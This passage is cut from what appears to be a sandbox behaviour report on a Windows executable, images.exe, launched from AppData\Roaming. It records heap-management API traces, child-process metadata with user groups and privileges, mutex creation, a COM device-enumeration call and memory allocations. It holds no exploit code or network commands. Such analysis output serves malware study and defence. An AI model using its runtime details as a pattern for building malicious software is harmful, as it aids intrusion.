lpMem=0x434d28) returned 1 [0195.344] GetProcessHeap () returned 0x420000 [0195.344] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x434d28) returned 0x10 [0195.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x434d28 | out: hHeap=0x420000) returned 1 [0195.345] GetProcessHeap () returned 0x420000 [0195.345] GetProcessHeap () returned 0x420000 [0195.345] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x435238) returned 1 [0195.345] GetProcessHeap () returned 0x420000 [0195.345] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x435238) returned 0x14 [0195.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x435238 | out: hHeap=0x420000) returned 1 [0195.345] GetProcessHeap () returned 0x420000 [0195.345] GetProcessHeap () returned 0x420000 [0195.345] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x435a80) returned 1 [0195.345] GetProcessHeap () returned 0x420000 [0195.345] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x435a80) returned 0x208 [0195.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x435a80 | out: hHeap=0x420000) returned 1 [0195.345] GetProcessHeap () returned 0x420000 [0195.345] GetProcessHeap () returned 0x420000 [0195.345] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x434c50) returned 1 [0195.345] GetProcessHeap () returned 0x420000 [0195.345] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x434c50) returned 0x10 [0195.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x434c50 | out: hHeap=0x420000) returned 1 [0195.345] GetProcessHeap () returned 0x420000 [0195.345] GetProcessHeap () returned 0x420000 [0195.345] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x4351f8) returned 1 [0195.345] GetProcessHeap () returned 0x420000 [0195.345] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x4351f8) returned 0x14 [0195.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4351f8 | out: hHeap=0x420000) returned 1 [0195.345] GetProcessHeap () returned 0x420000 [0195.345] GetProcessHeap () returned 0x420000 [0195.345] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x436718) returned 1 [0195.345] GetProcessHeap () returned 0x420000 [0195.345] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x436718) returned 0x200 [0195.345] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x436718 | out: hHeap=0x420000) returned 1 [0195.345] GetProcessHeap () returned 0x420000 [0195.345] GetProcessHeap () returned 0x420000 [0195.346] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x434cc8) returned 1 [0195.346] GetProcessHeap () returned 0x420000 [0195.346] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x434cc8) returned 0x10 [0195.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x434cc8 | out: hHeap=0x420000) returned 1 [0195.346] GetProcessHeap () returned 0x420000 [0195.346] GetProcessHeap () returned 0x420000 [0195.346] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x435198) returned 1 [0195.346] GetProcessHeap () returned 0x420000 [0195.346] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x435198) returned 0x14 [0195.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x435198 | out: hHeap=0x420000) returned 1 [0195.346] GetProcessHeap () returned 0x420000 [0195.346] GetProcessHeap () returned 0x420000 [0195.346] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x447148) returned 1 [0195.346] GetProcessHeap () returned 0x420000 [0195.346] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x447148) returned 0x1000 [0195.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x447148 | out: hHeap=0x420000) returned 1 [0195.346] GetProcessHeap () returned 0x420000 [0195.346] GetProcessHeap () returned 0x420000 [0195.346] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x4410f8) returned 1 [0195.346] GetProcessHeap () returned 0x420000 [0195.346] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x4410f8) returned 0x10 [0195.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4410f8 | out: hHeap=0x420000) returned 1 [0195.346] GetProcessHeap () returned 0x420000 [0195.346] GetProcessHeap () returned 0x420000 [0195.346] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x435178) returned 1 [0195.346] GetProcessHeap () returned 0x420000 [0195.346] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x435178) returned 0x14 [0195.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x435178 | out: hHeap=0x420000) returned 1 [0195.346] GetProcessHeap () returned 0x420000 [0195.346] GetProcessHeap () returned 0x420000 [0195.346] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x435318) returned 1 [0195.346] GetProcessHeap () returned 0x420000 [0195.346] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x435318) returned 0x14 [0195.346] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x435318 | out: hHeap=0x420000) returned 1 [0195.346] GetProcessHeap () returned 0x420000 [0195.347] GetProcessHeap () returned 0x420000 [0195.347] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x434d10) returned 1 [0195.347] GetProcessHeap () returned 0x420000 [0195.347] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x434d10) returned 0x10 [0195.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x434d10 | out: hHeap=0x420000) returned 1 [0195.347] GetProcessHeap () returned 0x420000 [0195.347] GetProcessHeap () returned 0x420000 [0195.347] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x435118) returned 1 [0195.347] GetProcessHeap () returned 0x420000 [0195.347] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x435118) returned 0x14 [0195.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x435118 | out: hHeap=0x420000) returned 1 [0195.347] GetProcessHeap () returned 0x420000 [0195.347] GetProcessHeap () returned 0x420000 [0195.347] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x435358) returned 1 [0195.347] GetProcessHeap () returned 0x420000 [0195.347] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x435358) returned 0x16 [0195.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x435358 | out: hHeap=0x420000) returned 1 [0195.347] GetProcessHeap () returned 0x420000 [0195.347] GetProcessHeap () returned 0x420000 [0195.347] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x434ce0) returned 1 [0195.347] GetProcessHeap () returned 0x420000 [0195.347] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x434ce0) returned 0x10 [0195.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x434ce0 | out: hHeap=0x420000) returned 1 [0195.347] GetProcessHeap () returned 0x420000 [0195.347] GetProcessHeap () returned 0x420000 [0195.347] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x4350e0) returned 1 [0195.347] GetProcessHeap () returned 0x420000 [0195.347] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x4350e0) returned 0x14 [0195.347] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4350e0 | out: hHeap=0x420000) returned 1 [0195.347] GetProcessHeap () returned 0x420000 [0195.347] GetProcessHeap () returned 0x420000 [0195.347] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x4448d0) returned 1 [0195.347] GetProcessHeap () returned 0x420000 [0195.348] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x4448d0) returned 0x6c [0195.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4448d0 | out: hHeap=0x420000) returned 1 [0195.348] GetProcessHeap () returned 0x420000 [0195.348] GetProcessHeap () returned 0x420000 [0195.348] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x434fc0) returned 1 [0195.348] GetProcessHeap () returned 0x420000 [0195.348] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x434fc0) returned 0x14 [0195.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x434fc0 | out: hHeap=0x420000) returned 1 [0195.348] GetProcessHeap () returned 0x420000 [0195.348] GetProcessHeap () returned 0x420000 [0195.348] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x434fe0) returned 1 [0195.348] GetProcessHeap () returned 0x420000 [0195.348] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x434fe0) returned 0x14 [0195.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x434fe0 | out: hHeap=0x420000) returned 1 [0195.348] GetProcessHeap () returned 0x420000 [0195.348] GetProcessHeap () returned 0x420000 [0195.348] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x435000) returned 1 [0195.348] GetProcessHeap () returned 0x420000 [0195.348] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x435000) returned 0x14 [0195.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x435000 | out: hHeap=0x420000) returned 1 [0195.348] GetProcessHeap () returned 0x420000 [0195.348] GetProcessHeap () returned 0x420000 [0195.348] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x435020) returned 1 [0195.348] GetProcessHeap () returned 0x420000 [0195.348] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x435020) returned 0x14 [0195.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x435020 | out: hHeap=0x420000) returned 1 [0195.348] GetProcessHeap () returned 0x420000 [0195.348] GetProcessHeap () returned 0x420000 [0195.348] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x4352b8) returned 1 [0195.348] GetProcessHeap () returned 0x420000 [0195.348] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x4352b8) returned 0x14 [0195.348] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4352b8 | out: hHeap=0x420000) returned 1 [0195.349] GetProcessHeap () returned 0x420000 [0195.349] GetProcessHeap () returned 0x420000 [0195.349] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x4352d8) returned 1 [0195.349] GetProcessHeap () returned 0x420000 [0195.349] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x4352d8) returned 0x14 [0195.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4352d8 | out: hHeap=0x420000) returned 1 [0195.349] GetProcessHeap () returned 0x420000 [0195.349] GetProcessHeap () returned 0x420000 [0195.349] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x436920) returned 1 [0195.349] GetProcessHeap () returned 0x420000 [0195.349] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x436920) returned 0x30 [0195.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x436920 | out: hHeap=0x420000) returned 1 [0195.349] GetProcessHeap () returned 0x420000 [0195.349] GetProcessHeap () returned 0x420000 [0195.349] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x4352f8) returned 1 [0195.349] GetProcessHeap () returned 0x420000 [0195.349] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x4352f8) returned 0x14 [0195.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4352f8 | out: hHeap=0x420000) returned 1 [0195.349] GetProcessHeap () returned 0x420000 [0195.349] GetProcessHeap () returned 0x420000 [0195.349] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x436958) returned 1 [0195.349] GetProcessHeap () returned 0x420000 [0195.349] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x436958) returned 0x30 [0195.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x436958 | out: hHeap=0x420000) returned 1 [0195.349] GetProcessHeap () returned 0x420000 [0195.349] GetProcessHeap () returned 0x420000 [0195.349] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x435378) returned 1 [0195.349] GetProcessHeap () returned 0x420000 [0195.349] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x435378) returned 0x14 [0195.349] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x435378 | out: hHeap=0x420000) returned 1 [0195.349] GetProcessHeap () returned 0x420000 [0195.349] GetProcessHeap () returned 0x420000 [0195.349] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x441080) returned 1 [0195.349] GetProcessHeap () returned 0x420000 [0195.350] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x441080) returned 0xe [0195.350] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x441080 | out: hHeap=0x420000) returned 1 [0195.350] GetProcessHeap () returned 0x420000 [0195.350] GetProcessHeap () returned 0x420000 [0195.350] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x435758) returned 1 [0195.350] GetProcessHeap () returned 0x420000 [0195.350] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x435758) returned 0x14 [0195.350] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x435758 | out: hHeap=0x420000) returned 1 [0195.350] GetProcessHeap () returned 0x420000 [0195.350] GetProcessHeap () returned 0x420000 [0195.350] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x434c08) returned 1 [0195.350] GetProcessHeap () returned 0x420000 [0195.350] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x434c08) returned 0x10 [0195.350] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x434c08 | out: hHeap=0x420000) returned 1 [0195.350] GetProcessHeap () returned 0x420000 [0195.350] GetProcessHeap () returned 0x420000 [0195.350] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x435040) returned 1 [0195.350] GetProcessHeap () returned 0x420000 [0195.350] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x435040) returned 0x14 [0195.350] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x435040 | out: hHeap=0x420000) returned 1 [0195.350] GetProcessHeap () returned 0x420000 [0195.350] GetProcessHeap () returned 0x420000 [0195.350] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x435060) returned 1 [0195.350] GetProcessHeap () returned 0x420000 [0195.350] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x435060) returned 0x14 [0195.350] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x435060 | out: hHeap=0x420000) returned 1 [0195.350] GetProcessHeap () returned 0x420000 [0195.350] GetProcessHeap () returned 0x420000 [0195.350] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x435080) returned 1 [0195.350] GetProcessHeap () returned 0x420000 [0195.350] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x435080) returned 0x14 [0195.350] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x435080 | out: hHeap=0x420000) returned 1 [0195.350] GetProcessHeap () returned 0x420000 [0195.351] GetProcessHeap () returned 0x420000 [0195.351] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x4350a0) returned 1 [0195.351] GetProcessHeap () returned 0x420000 [0195.351] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x4350a0) returned 0x14 [0195.351] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4350a0 | out: hHeap=0x420000) returned 1 [0195.351] GetProcessHeap () returned 0x420000 [0195.351] GetProcessHeap () returned 0x420000 [0195.351] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x434c20) returned 1 [0195.351] GetProcessHeap () returned 0x420000 [0195.351] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x434c20) returned 0x10 [0195.351] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x434c20 | out: hHeap=0x420000) returned 1 [0195.351] GetProcessHeap () returned 0x420000 [0195.351] GetProcessHeap () returned 0x420000 [0195.351] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x4350c0) returned 1 [0195.351] GetProcessHeap () returned 0x420000 [0195.351] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x4350c0) returned 0x14 [0195.351] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4350c0 | out: hHeap=0x420000) returned 1 [0195.351] GetProcessHeap () returned 0x420000 [0195.351] GetProcessHeap () returned 0x420000 [0195.351] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x435138) returned 1 [0195.351] GetProcessHeap () returned 0x420000 [0195.351] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x435138) returned 0x14 [0195.351] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x435138 | out: hHeap=0x420000) returned 1 [0195.351] GetProcessHeap () returned 0x420000 [0195.351] GetProcessHeap () returned 0x420000 [0195.351] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x4351b8) returned 1 [0195.351] GetProcessHeap () returned 0x420000 [0195.351] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x4351b8) returned 0x14 [0195.351] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4351b8 | out: hHeap=0x420000) returned 1 [0195.351] GetProcessHeap () returned 0x420000 [0195.351] GetProcessHeap () returned 0x420000 [0195.351] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x4351d8) returned 1 [0195.351] GetProcessHeap () returned 0x420000 [0195.351] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x4351d8) returned 0x14 [0195.351] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4351d8 | out: hHeap=0x420000) returned 1 [0195.352] GetProcessHeap () returned 0x420000 [0195.352] GetProcessHeap () returned 0x420000 [0195.352] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x435278) returned 1 [0195.352] GetProcessHeap () returned 0x420000 [0195.352] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x435278) returned 0x14 [0195.352] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x435278 | out: hHeap=0x420000) returned 1 [0195.352] GetProcessHeap () returned 0x420000 [0195.352] GetProcessHeap () returned 0x420000 [0195.352] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x434c38) returned 1 [0195.352] GetProcessHeap () returned 0x420000 [0195.352] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x434c38) returned 0x10 [0195.352] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x434c38 | out: hHeap=0x420000) returned 1 [0195.352] GetProcessHeap () returned 0x420000 [0195.352] GetProcessHeap () returned 0x420000 [0195.352] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x435158) returned 1 [0195.352] GetProcessHeap () returned 0x420000 [0195.352] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x435158) returned 0x14 [0195.352] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x435158 | out: hHeap=0x420000) returned 1 [0195.352] GetProcessHeap () returned 0x420000 [0195.352] GetProcessHeap () returned 0x420000 [0195.352] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x434bf0) returned 1 [0195.352] GetProcessHeap () returned 0x420000 [0195.352] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x434bf0) returned 0x10 [0195.352] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x434bf0 | out: hHeap=0x420000) returned 1 [0195.352] exit (_Code=1) Thread: id = 199 os_tid = 0x34c Process: id = "21" image_name = "images.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\images.exe" page_root = "0x5e6a2000" os_pid = "0x348" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0x718" cmd_line = "\"{path}\"" cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e51c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 200 os_tid = 0x13c Process: id = "22" image_name = "images.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\images.exe" page_root = "0x7a4c2000" os_pid = "0x30c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0x718" cmd_line = "\"{path}\"" cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e51c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 201 os_tid = 0x7a8 Process: id = "23" image_name = "images.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\images.exe" page_root = "0x5ebc7000" os_pid = "0x63c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0x718" cmd_line = "\"{path}\"" cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e51c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 202 os_tid = 0x68c Process: id = "24" image_name = "images.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\images.exe" page_root = "0x5edcc000" os_pid = "0x66c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0x718" cmd_line = "\"{path}\"" cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e51c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 203 os_tid = 0x428 Process: id = "25" image_name = "images.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\images.exe" page_root = "0x5f2d1000" os_pid = "0x4a4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0x718" cmd_line = "\"{path}\"" cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e51c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 204 os_tid = 0x480 [0196.221] GetCommandLineA () returned="\"{path}\"" [0196.221] GetStartupInfoA (in: lpStartupInfo=0x29fe3c | out: lpStartupInfo=0x29fe3c*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0196.221] GetProcessHeap () returned 0x610000 [0196.222] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x80) returned 0x62e6c8 [0196.330] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0xb8 [0196.330] GetProcessHeap () returned 0x610000 [0196.330] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x38) returned 0x622e60 [0196.352] GetProcessHeap () returned 0x610000 [0196.352] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x14) returned 0x622ea0 [0196.352] GetProcessHeap () returned 0x610000 [0196.352] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x28) returned 0x62d218 [0196.352] GetProcessHeap () returned 0x610000 [0196.352] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x50) returned 0x62e750 [0196.352] GetProcessHeap () returned 0x610000 [0196.352] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xa0) returned 0x62e7a8 [0196.352] CoInitialize (pvReserved=0x0) returned 0x0 [0196.409] CoCreateInstance (in: rclsid=0x4135d0*(Data1=0x62be5d10, Data2=0x60eb, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x416314*(Data1=0x29840822, Data2=0x5b84, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), ppv=0x29fdf8 | out: ppv=0x29fdf8*=0x8ef610) returned 0x0 [0196.511] SystemDeviceEnum:ICreateDevEnum:CreateClassEnumerator (in: This=0x8ef610, clsidDeviceClass=0x4135c0*(Data1=0x860bb310, Data2=0x5d01, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), ppenumMoniker=0x29fdfc, dwFlags=0x0 | out: ppenumMoniker=0x29fdfc*=0x0) returned 0x1 [0196.592] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x320000 [0196.593] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x330000 [0196.593] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x340000 [0196.593] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x3d0000 [0196.593] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x3e0000 [0196.593] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0196.594] GetProcessHeap () returned 0x610000 [0196.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x19) returned 0x636ad8 [0196.594] GetProcessHeap () returned 0x610000 [0196.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x19) returned 0x644038 [0196.594] GetProcessHeap () returned 0x610000 [0196.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x19) returned 0x6442e0 [0196.594] GetProcessHeap () returned 0x610000 [0196.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x19) returned 0x6442b8 [0196.594] GetProcessHeap () returned 0x610000 [0196.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x19) returned 